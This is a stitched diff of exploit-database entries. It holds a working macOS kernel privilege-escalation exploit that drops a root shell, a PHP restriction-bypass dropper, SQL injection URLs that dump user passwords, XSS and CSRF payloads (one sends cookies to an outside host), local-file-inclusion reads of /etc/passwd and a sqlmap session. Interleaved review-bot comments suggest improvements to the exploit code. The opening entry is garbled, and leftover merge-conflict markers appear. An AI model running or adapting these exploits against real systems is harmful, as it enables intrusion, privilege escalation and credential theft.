NetStorage 2.0.1 on NetWare 6.5 SP6
The following examples are available:
Cross-site scripting:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Denial of service:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Information disclosure:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

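--- a/platforms/osx/dos/32817.txt
+++ b/platforms/osx/dos/32817.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/33909/info
+Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference.
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+Apple Safari 4 Beta is vulnerable; other versions may also be affected.
+The following example URIs are available:
+feeds:%&www.example.com/feed/
+feeds:{&www.example.com/feed/
+feeds:}&www.example.com/feed/
+feeds:^&www.example.com/feed/
+feeds:`&www.example.com/feed/
+feeds:|&www.example.com/feed/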

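--- a/platforms/osx/local/32813.c
+++ b/platforms/osx/local/32813.c
@@ -0,0 +1,163 @@
+/*
+* Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
+* CVE None
+* by Kenzley Alphonse <kenzley [dot] alphonse [at] gmail [dot] com>
+*
+*
+* Notes:
+* This exploit leverage a stack overflow vulnerability to escalate privileges.
+* The vulnerable function nfs_convert_old_nfs_args does not verify the size
+* of a user-provided argument before copying it to the stack. As a result by
+* passing a large size, a local user can overwrite the stack with arbitrary
+* content.
+*
+* Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
+* Tested on Max OS X Lion xnu-1699.32.7 (x86_64)
+*
+* Greets to taviso, spender, joberheide
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <errno.h>
+#include <sys/mman.h>
+#include <sys/mount.h>
+#include <sys/param.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+/** change these to fit your environment if needed **/
+#define SSIZE (536)
+/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/
+struct user_nfs_args {
+int version; /* args structure version number */
+char* addr __attribute__((aligned(8))); /* file server address */
+int addrlen; /* length of address */
+int sotype; /* Socket type */
+int proto; /* and Protocol */
+char * fh __attribute__((aligned(8))); /* File handle to be mounted */
+int fhsize; /* Size, in bytes, of fh */
+int flags; /* flags */
+int wsize; /* write size in bytes */
+int rsize; /* read size in bytes */
+int readdirsize; /* readdir size in bytes */
+int timeo; /* initial timeout in .1 secs */
+int retrans; /* times to retry send */
+int maxgrouplist; /* Max. size of group list */
+int readahead; /* # of blocks to readahead */
+int leaseterm; /* obsolete: Term (sec) of lease */
+int deadthresh; /* obsolete: Retrans threshold */
+char* hostname __attribute__((aligned(8))); /* server's name */
+/* NFS_ARGSVERSION 3 ends here */
+int acregmin; /* reg file min attr cache timeout */
+int acregmax; /* reg file max attr cache timeout */
+int acdirmin; /* dir min attr cache timeout */
+int acdirmax; /* dir max attr cache timeout */
+/* NFS_ARGSVERSION 4 ends here */
+uint auth; /* security mechanism flavor */
+/* NFS_ARGSVERSION 5 ends here */
+uint deadtimeout; /* secs until unresponsive mount considered dead */
+};
+/** sets the uid for the current process and safely exits from the kernel**/
+static void r00t_me() {
+asm(
+// padding
+"nop; nop; nop; nop;"
+// task_t %rax = current_task()
+"movq %%gs:0x00000008, %%rax;"
+"movq 0x00000348(%%rax), %%rax;"
+// proc %rax = get_bsdtask_info()
+"movq 0x000002d8(%%rax),%%rax;"
+// ucred location at proc
+"movq 0x000000d0(%%rax),%%rax;"
+// uid = 0
+"xorl %%edi, %%edi;"
+"movl %%edi, 0x0000001c(%%rax);"
+"movl %%edi, 0x00000020(%%rax);"
+// fix the stack pointer and return (EACCES)
+"movq $13, %%rax;"
+"addq $0x00000308,%%rsp;"
+"popq %%rbx;"
+"popq %%r12;"
+"popq %%r13;"
+"popq %%r14;"
+"popq %%r15;"
+"popq %%rbp;"
+"ret;"
+:::"%rax"
+);
+}
+int main(int argc, char ** argv) {
+struct user_nfs_args xdrbuf;
+char * path;
+char obuf[SSIZE];
+/** clear the arguments **/
+memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
+memset(obuf, 0x00, SSIZE);
+/** set up variable to get path to vulnerable code **/
+xdrbuf.version = 3;
+xdrbuf.hostname = "localhost";
+xdrbuf.addrlen = SSIZE;
+xdrbuf.addr = obuf;
+/** set ret address **/
+*(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
+printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]);
+/** create a unique tmp name **/
+if ((path = tmpnam(NULL)) == NULL) {
+// path can be any directory which we have read/write/exec access
+// but I'd much rather create one instead of searching for one
+perror("[-] tmpnam");
+exit(EXIT_FAILURE);
+}
+/** make the path in tmp so that we can use it **/
+if (mkdir(path, 0660) < 0) {
+perror("[-] mkdir");
+exit(EXIT_FAILURE);
+}
+/** inform the user that the path was created **/
+printf("[*] created sploit path%s\n", path);
+/** call the vulnerable function **/
+if (mount("nfs", path, 0, &xdrbuf) < 0) {
+if (errno == EACCES) {
+puts("[+] escalating privileges...");
+} else {
+perror("[-] mount");
+}
+}
+/** clean up tmp dir **/
+if (rmdir(path) < 0) {
+perror("[-] rmdir");
+}
+/** check if privs are equal to root **/
+if (getuid() != 0) {
+puts("[-] priviledge escalation failed");
+exit(EXIT_FAILURE);
+}
+/** get root shell **/
+printf("[+] We are now uid=%i ... your welcome!\n", getuid());
+printf("[+] Dropping a shell.\n");
+execl("/bin/sh", "/bin/sh", NULL);
+return 0;
+}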
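Review bot: mkdir(path, 0660) in main creates the directory without the execute (search) bit, which contradicts the comment a few lines above stating the path needs read/write/exec access; `mkdir(path, 0700)` matches the comment. tmpnam() is deprecated and leaves a window between name generation and mkdir() in which another process can claim the name; mkdtemp() with a template such as `/tmp/XXXXXX` creates the directory atomically and would replace the tmpnam/mkdir pair using only the headers already included. The terminating argument of execl() should be written `(char *)NULL`, since a bare NULL may be passed through the variadic call as an int on some platforms. memset() is declared in <string.h> rather than <strings.h>, so the include list appears to rely on the platform header pulling it in.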

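--- a/platforms/php/local/32901.php
+++ b/platforms/php/local/32901.php
@@ -0,0 +1,66 @@
+source: http://www.securityfocus.com/bid/34475/info
+PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access files in unauthorized locations.
+This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' and 'open_basedir' restrictions assumed to isolate the users from each other.
+PHP 5.2.9 is vulnerable; other versions may also be affected.
+<?php
+/* SecurityReason.com - Security Audit Stuff
+PHP 5.2.9 curl safe_mode & open_basedir bypass
+http://securityreason.com/achievement_securityalert/61
+exploit from "SecurityReason - Security Audit" lab.
+for legal use only
+http://securityreason.com/achievement_exploitalert/11
+author: Maksymilian Arciemowicz
+cxib [a&t] securityreason [0.0] com
+R.I.P. ladyBMS
+*/
+$freiheit=fopen('./cx529.php', 'w');
+fwrite($freiheit, base64_decode("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"));
+fclose($freiheit);
+echo "exploit has been generated . use cx529.php file";
+?>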

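--- a/platforms/php/webapps/32807.txt
+++ b/platforms/php/webapps/32807.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33859/info
+The gigCalendar component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+gigCalendar 1.0 is vulnerable; other versions may also be affected.
+http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
+UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23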

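--- a/platforms/php/webapps/32808.txt
+++ b/platforms/php/webapps/32808.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33872/info
+Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+Magento 1.2.0 is vulnerable; other versions may also be affected.
+http://www.example.com/index.php/admin/
+Username: "><script>alert('xss')</script>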

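--- a/platforms/php/webapps/32809.txt
+++ b/platforms/php/webapps/32809.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33872/info
+Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+Magento 1.2.0 is vulnerable; other versions may also be affected.
+http://www.example.com/index.php/admin/index/forgotpassword/
+Email address: "><script>alert('xss')</script>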


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33872/info
Magento is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
Magento 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E

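--- a/platforms/php/webapps/32814.txt
+++ b/platforms/php/webapps/32814.txt
@@ -0,0 +1,73 @@
+# Exploit Title: Sendy 1.1.9.1 - SQL Injection Vulnerability
+# Date: 2014-04-10
+# Exploit Author: marduk369
+# Vendor Homepage: http://sendy.co/
+# Software Link: http://sendy.co/
+# Version: 1.1.9.1
+root@kali:~# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; logged_in=[logged_in value]" -p c -D sendy --tables
+sqlmap/1.0-dev - automatic SQL injection and database takeover tool
+http://sqlmap.org
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+[*] starting at 11:48:57
+[11:48:57] [INFO] resuming back-end DBMS 'mysql'
+[11:48:57] [INFO] testing connection to the target URL
+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
+---
+Place: GET
+Parameter: c
+Type: AND/OR time-based blind
+Title: MySQL > 5.0.11 AND time-based blind
+Payload: c=10 AND SLEEP(5)&i=1
+---
+[11:48:58] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
+web application technology: PHP 5.3.2, Apache 2.2.14
+back-end DBMS: MySQL 5.0.11
+[11:48:58] [INFO] fetching tables for database: 'sendy'
+[11:48:58] [INFO] fetching number of tables for database 'sendy'
+[11:48:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
+do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
+[11:49:50] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
+[11:50:31] [INFO] adjusting time delay to 3 seconds due to good response times
+9
+[11:50:33] [INFO] retrieved: ap
+[11:53:39] [ERROR] invalid character detected. retrying..
+[11:53:39] [WARNING] increasing time delay to 4 seconds
+ps
+[11:56:31] [INFO] retrieved: ares
+[12:00:00] [INFO] retrieved: ares_emails
+[12:08:38] [INFO] retrieved: campaigns
+[12:18:08] [INFO] retrieved: links
+[12:24:28] [ERROR] invalid character detected. retrying..
+[12:24:28] [WARNING] increasing time delay to 5 seconds
+[12:24:31] [INFO] retrieved: lists
+[12:29:49] [INFO] retrieved: login
+[12:36:33] [ERROR] invalid character detected. retrying..
+[12:36:33] [WARNING] increasing time delay to 6 seconds
+[12:36:37] [INFO] retrieved: queue
+[12:43:51] [INFO] retrieved: subscribers
+Database: sendy
+[9 tables]
++-------------+
+| apps |
+| ares |
+| ares_emails |
+| campaigns |
+| links |
+| lists |
+| login |
+| queue |
+| subscribers |
++-------------+
+[13:00:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/server1'
+[*] shutting down at 13:00:16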


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33908/info
Orooj CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member

10
platforms/php/webapps/32819.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33914/info
Parsi PHP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Parsi PHP CMS 2.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u
ser/*

20
platforms/php/webapps/32823.txt Executable file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/33931/info
Irokez Blog is prone to multiple input-validation vulnerabilities:
- A cross-site scripting issue
- An SQL-injection issue
- Multiple remote file-include issues
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Irokez Blog 0.7.3.2 is vulnerable; other versions may also be affected.
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
http://www.example.com/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://www.example.com/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://www.example.com/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
http://www.example.com/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33943/info
Afian is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/path/css/includer.php?files=PATH_TO_FILES

11
platforms/php/webapps/32828.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/33944/info
Yektaweb Academic Web Tools CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
Academic Web Tools CMS 1.5.7 is vulnerable; other versions may also be affected.
http://www.example.com/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
http://www.example.com/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
http://www.example.com/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>

50
platforms/php/webapps/32830.txt Executable file

@ -0,0 +1,50 @@
# Exploit Title: CubeCart 5.2.8 Session Fixation
# Exploit Author: James Sibley (absane)
# Blog: http://www.pentester.co
# Download link: http://www.cubecart.com/download/5.2.8/zip
# Discovery date: March 14th, 2014
# Vendor notified: March 15th, 2014
# Vendor fixed: April 10th, 2014
# Vendor ack: http://forums.cubecart.com/topic/48427-cubecart-529-relased/
# CVE assignment: CVE-2014-2341
CubeCart 5.2.8 is vulnerable to a session fixation vulnerability.
The only protection offered is via the User-Agent header field, which can spoofed to match the victim.
=======================
=Proof of Concept.....=
=======================
*Set the User-Agent for both attacker and victim:
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
*To attack a customer:
Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337
*To attack an administrator:
Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337
When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session.
=======================
=Cause................=
=======================
The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id.
The code handling login procedures do not generate new sessions upon successful authentication.
=======================
=Mitigation...........=
=======================
Upgrade to CubeCart >= 5.2.9
If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability:
In admin.class.php add this at line 324:
$GLOBALS['session']->restart();
In user.class.php add this at line 227:
$GLOBALS['session']->restart();
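Review bot: The workaround at the end of the hunk is given as absolute line numbers (`admin.class.php` line 324, `user.class.php` line 227) with no enclosing function named, so it can only be verified or applied against the exact 5.2.8 archive linked above; naming the successful-login code path the `restart()` call belongs in would make it portable across builds. The Mitigation section could also name the standard PHP controls that address both items listed under Cause: `session_regenerate_id(true)` after a successful login, and `session.use_only_cookies = 1` so a session id passed as a `PHPSESSID` URL parameter is not honoured.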

36
platforms/php/webapps/32831.txt Executable file

@ -0,0 +1,36 @@
###########################################################
[~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability
[~] Author: sajith
[~] version: Microweber CMS v0.93
[~]Vendor Homepage: http://microweber.com/
[~] vulnerable app link:http://microweber.com/download
###########################################################
[*] Application is vulnerable to CSRF.below is the POC where attacker can
use this vulnerability to create new user and assign Admin role to the user
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="
http://127.0.0.1/cms/microweber-0.9343/microweber-master/api/save_user"
id="formid" method="post">
<input type="hidden" name="id" value="0" />
<input type="hidden" name="thumbnail" value="" />
<input type="hidden" name="username" value="test1" />
<input type="hidden" name="password" value="mypassword" />
<input type="hidden" name="email" value="test@testing.com" />
<input type="hidden" name="first_name" value="abc" />
<input type="hidden" name="last_name" value="xyz" />
<input type="hidden" name="is_active" value="y" />
<input type="hidden" name="is_admin" value="y" />
<input type="hidden" name="basic_mode" value="n" />
<input type="hidden" name="api_key" value="1234" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
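Review bot: The advisory does not say whether `api/save_user` validates the `api_key` field the form submits (`value="1234"`), so a reader cannot tell whether the CSRF works without knowledge of a site-specific key; that decides whether this is an unauthenticated admin-creation issue or one that also needs a leaked secret, and it should be stated explicitly in the `[*]` line. Two smaller defects in the PoC text: the `action` attribute is split across two lines with a newline inside the quotes, and the document starts at `<head>` with no opening `<html>` to match the closing tag.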


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33968/info
NovaBoard is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
NovaBoard 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=

10
platforms/php/webapps/32840.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34016/info
Amoot Web Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/modir
Username:admin
Password: ' or '


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34017/info
CMSCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMSCart 1.04 is vulnerable; other versions may also be affected.
http://www.example.com/cmscart/index.php?MenuLevel1=%27


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34018/info
UMI CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to UMI CMS 2.7.1 (build 10856) are vulnerable.
http://www.example.com/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert(&#039;XSS&#039;)%3C/script%3E&fields_filter[price][1]=1


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34021/info
TinX CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to TinX CMS 3.5.1 are vulnerable.
http://www.example.com/system/rss.php?id=1'SQL-code


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34038/info
PHORTAIL is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
PHORTAIL 1.2.1 is vulnerable; other versions may also be affected.
<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head> <hr><pre> Module : PHORTAIL 1.2.1 download : http://www.phpscripts-fr.net/scripts/download.php?id=330 Vul : XSS Vulnerability file : poster.php Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org </pre><hr> <form name="rapporter" action="http://www.example.com/poster.php" method="POST"></br> <input type="hidden" name="ajn" value="1"> <input type="text" name="pseudo" value="xss">=>Pseudo</br> <input type="text" name="email" value="xss@xss.com">=>E-mail</br> <input type="text" name="ti" value="<script>alert('xss PoC');</script>">=>XSS vulnerability</br> <input type="text" name="txt" value="xss">=>text</br> <input type="submit" value="Start"></br> </form> </html>

10
platforms/php/webapps/32846.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34067/info
Nenriki CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Nenriki CMS 0.5 is vulnerable; other versions may also be affected.
javascript:document.cookie ="password=1; path=/" then
javascript:document.cookie ="ID=' union select 0,0,0,concat(id,name,char(58),password),0,0 from users--; path=/"


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34105/info
TikiWiki is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
TikiWiki 2.2 through 3.0 beta1 are vulnerable.
http://www.example.com/tiki-galleries.php/>"><Script>alert(1)</scRipt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34106/info
TikiWiki is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
TikiWiki 2.2 through 3.0 beta1 are vulnerable.
http://www.example.com/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34107/info
TikiWiki is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
TikiWiki 2.2 through 3.0 beta1 are vulnerable.
http://www.example.com/tiki-listpages.php/>"><Script>alert(3)</scRipt>

11
platforms/php/webapps/32861.txt Executable file

@ -0,0 +1,11 @@
[+] Local File Inclusion in WordPress Theme LineNity
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
[+] PoC: http://localhost/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
http://localhost/wordpress/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
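Review bot: The title and the `[+] Exploit` line classify this as Local File Inclusion, but the affected endpoint is `download.php` and the PoC retrieves `/etc/passwd` through `imgurl`, which reads more like arbitrary file download / path traversal than inclusion of PHP source; I cannot confirm which from the hunk. The distinction matters for triage (information disclosure versus code execution), so the advisory should state what the endpoint does with the supplied path, for example `[+] Impact: <file disclosure or inclusion — confirm against download.php>`.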

61
platforms/php/webapps/32867.txt Executable file

@ -0,0 +1,61 @@
Details
================
Software: Quick Page/Post Redirect Plugin
Version: 5.0.3
Homepage: http://wordpress.org/plugins/quick-pagepost-redirect-plugin/
Advisory ID: dxw-1970-1091
CVE: CVE-2014-2598
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
Description
================
CSRF and stored XSS in Quick Page/Post Redirect Plugin
Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack meaning that if an admin user can be persuaded to visit a URL of the attackers choosing (via spear phishing for instance), the attacker can insert arbitrary JavaScript into an admin page. Once that occurs the admins browser can be made to do almost anything the admin user could typically do such as create/delete posts, create new admin users, or even exploit vulnerabilities in other plugins.
Proof of concept
================
Use the following form to introduce potentially malicious JavaScript:
<form method=\"POST\" action=\"http://localhost/wp-admin/admin.php?page=redirect-updates\">
<input type=\"text\" name=\"quickppr_redirects[request][]\" value=\""><script>alert(1)</script>\">
<input type=\"text\" name=\"quickppr_redirects[destination][]\" value=\"http://dxw.com/\">
<Input type=\"text\" name=\"submit_301\" value=\"1\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 5.0.5 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-03-21: Discovered
2014-03-24: Reported to plugins@wordpress.org
2014-04-07: No response; requested an alternative email address using the authors contact form.
2014-04-08: Re-reported direct to author
2014-04-08: Author responded, and publication agreed on or before 2014-05-06
2014-04-10: Author reports issue fixed in version 5.0.5
<<<<<<< HEAD
Discovered by dxw:
================
Tom Adams
=======
Discovered by dxw:
================
Tom Adams
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
Please visit security.dxw.com for more information.
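Review bot: Unresolved merge-conflict markers were committed into the advisory: the `<<<<<<< HEAD`, `=======` and `>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464` lines near the end of the hunk enclose two identical copies of the `Discovered by dxw:` block. The same markers appear in platforms/php/webapps/32868.txt. Keep one copy of the three-line block and drop the four marker lines in both files; nothing else in either file refers to them.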

57
platforms/php/webapps/32868.txt Executable file

@ -0,0 +1,57 @@
Details
================
Software: Twitget
Version: 3.3.1
Homepage: http://wordpress.org/plugins/twitget/
Advisory ID: dxw-1970-435
CVE: CVE-2014-2559
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:P/A:N)
Description
================
CSRF/XSS vulnerability in Twitget 3.3.1
Vulnerability
================
If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file.
Proof of concept
================
<form action=\"http://localhost/wp-admin/options-general.php?page=twitget/twitget.php\" method=\"POST\">
<input type=\"text\" name=\"twitget_username\" value=\"john_smith\">
<input type=\"text\" name=\"twitget_consumer_key\" value=\""><script>alert(\'dxw\')</script>\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 3.3.3 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2013-07-30: Discovered
2014-03-18: Reported to plugins@wordpress.org
2014-04-09: Author reports fixed in version 3.3.3.
<<<<<<< HEAD
Discovered by dxw:
================
Tom Adams
=======
Discovered by dxw:
================
Tom Adams
>>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464
Please visit security.dxw.com for more information.


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34193/info
ExpressionEngine is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
ExpressionEngine 1.6.4 through 1.6.6 are affected. Other versions may also be vulnerable.
chococat.gif"><script>alert('XSS')</script><div "a


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34223/info
PHPizabi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPizabi 0.848b C1 HFP1 is vulnerable; other versions may also be affected.
